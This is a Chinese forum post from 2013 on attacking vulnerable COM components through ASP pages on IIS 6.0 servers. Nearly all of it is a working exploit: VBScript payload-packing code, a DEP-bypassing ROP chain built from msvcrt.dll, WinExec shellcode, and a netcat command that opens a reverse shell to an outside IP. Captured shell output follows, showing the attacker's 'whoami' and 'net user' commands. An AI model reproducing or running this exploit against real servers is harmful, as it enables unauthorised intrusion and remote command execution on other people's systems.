攻击ASP中的COM组件

楼主^#

更多发布于：2013-03-28 08:36

[] 1


	事实上，很多COM组件，不仅仅能攻击IE客户端。当服务器在注册了有漏洞的COM组件的时候，对于支持ASP的IIS服务器上，可以使用ASP作为容器，对这些组件发动攻击，以突破很多组件被删除，导致无法执行命令的瓶颈。而由于IIS的容错处理，不会影响IIS的运行，所以自由使用WinExec执行命令。 Demo：漏洞组件Vulntest.vun具有一个简单的栈溢出漏洞，漏洞原理和基本栈溢出利用不提测试平台Windows2003 SP2 简体中文版(x86)+ IIS6.0 ASP攻击代码示例： <% FunctionPadding(intLen) DimstrRet, intSize intSize= intLen/2 - 1 For I= 0 To intSize Step 1 strRet= strRet ; unescape("%u4141") Next Padding= strRet EndFunction FunctionPackDWORD(strPoint) strTmp= replace(strPoint, "0x", "") PackDWORD= PackDWORD ; UnEscape("%u" ; Mid(strTmp, 5, 2);Mid(strTmp, 7, 2)) PackDWORD= PackDWORD ; UnEscape("%u" ; Mid(strTmp, 1, 2);Mid(strTmp, 3, 2)) EndFunction FunctionPackList(arrList) ForEach Item In arrList PackList= PackList ; PackDWORD(Item) Next EndFunction FunctionPackShellcode(strCode) intLen= Len(strCode) / 4 IfintLen Mod 2 = 1 Then strCode= strCode ; "\x90" intLen= intLen + 1 EndIf arrTmp= Split(strCode, "\x") For I= 1 To UBound(arrTmp) Step 2 PackShellcode= PackShellcode ; UnEscape("%u" ; arrTmp(I + 1);arrTmp(I)) Next EndFunction FunctionUnicodeToAscii(uStrIn) intLen= Len(strCommand) IfintLen Mod 2 = 1 Then ForI = 1 To intLen - 1 Step 2 UnicodeToAscii= UnicodeToAscii ; "%u" ; Hex(Asc(Mid(strCommand, I+1, 1))) ; Hex(Asc(Mid(strCommand, I, 1))) Next UnicodeToAscii= UnicodeToAscii ; "%u00" ; Hex(Asc(Mid(strCommand,I,1))) Else ForI = 1 To intLen - 1 Step 2 UnicodeToAscii= UnicodeToAscii ; "%u" ; Hex(Asc(Mid(strCommand, I+1, 1))) ; Hex(Asc(Mid(strCommand, I, 1))) Next EndIf UnicodeToAscii= UnEscape(UnicodeToAscii) EndFunction '''''''''''''''''''''''''''''bypassDEP with [msvcrt.dll] v7.0.3790.3959(C:\WINDOWS\system32\msvcrt.dll) Rop_Chain= Array(_ "0x77bae04e",_ "0xffffffc0",_ "0x77b7c427",_ "0x77bb2266",_ "0x77bb2265",_ "0x77b7f641",_ "0x77baf392",_ "0xA2A6AE89",_ "0x77bafe37",_ "0x77baf392",_ "0x90909090",_ "0x77ba2033",_ "0x77bbf004",_ "0x77b9b06c",_ "0x7c801fe3",_ "0x77bb6591"_ ) '''''''''''''''''''''''''''''junkand ret address Junk0= Padding(52) Ret_Addr= PackDWORD("0x77bb2266") '# RETN Junk1= Padding(8) '# because of "retn 8" '''''''''''''''''''''''''''''smallshellcode adjust esp Small_Shellcode= "\x33\xc0\x66\xb8\x40\x02\x2b\xe0" 'XOREAX,EAX 'MOVAX,240 'SUBESP,EAX '''''''''''''''''''''''''''''shellcodeWinExec (win2k sp2) Real_Shellcode="\xd9\xee\x9b\xd9\x74\x24\xf4\x5e\x83\xc6\x1a\x33\xc0\x50\x56\x68\x41\x41\x41\x41\x68\x16\x41\x86\x7c\xc3" 'D9EE FLDZ '9B WAIT 'D97424F4 FSTENV (28-BYTE) PTR SS:[ESP-C] '5E POP ESI '83C61a ADD ESI,1a '33C0 XOR EAX,EAX '50 PUSH EAX '56 PUSH ESI '68F1F8807C PUSH kernel32.ExitThread '681641867C PUSH kernel32.WinExec 'C3 RETN '''''''''''''''''''''''''''''cmdline strCommand= "C:\Inetpub\wwwroot\nc.exe -e cmd.exe 192.168.194.1 8080" '''''''''''''''''''''''''''''exploitvulntest.dll Payload= Junk0 ; Ret_Addr ; Junk1 ; PackList(Rop_Chain);PackShellcode(Small_Shellcode) ; PackShellcode(Real_Shellcode);UnicodeToAscii(strCommand) Setobj = CreateObject("Vulntest.test.1") obj.vulnpayload %> 测试结果：连接到 [192.168.194.1]来自 ACER-38787AC8AF[192.168.194.134] 1344 MicrosoftWindows [版本 5.2.3790] (C)版权所有 1985-2003Microsoft Corp. c:\windows\system32\inetsrv>whoami whoami ntauthority\network service c:\windows\system32\inetsrv>netuser netuser \\ACER-38787AC8AF的用户帐户 ------------------------------------------------------------------------------- Administrator Guest IUSR_ACER-38787AC8AF IWAM_ACER-38787AC8AF SQLDebugger 命令成功完成。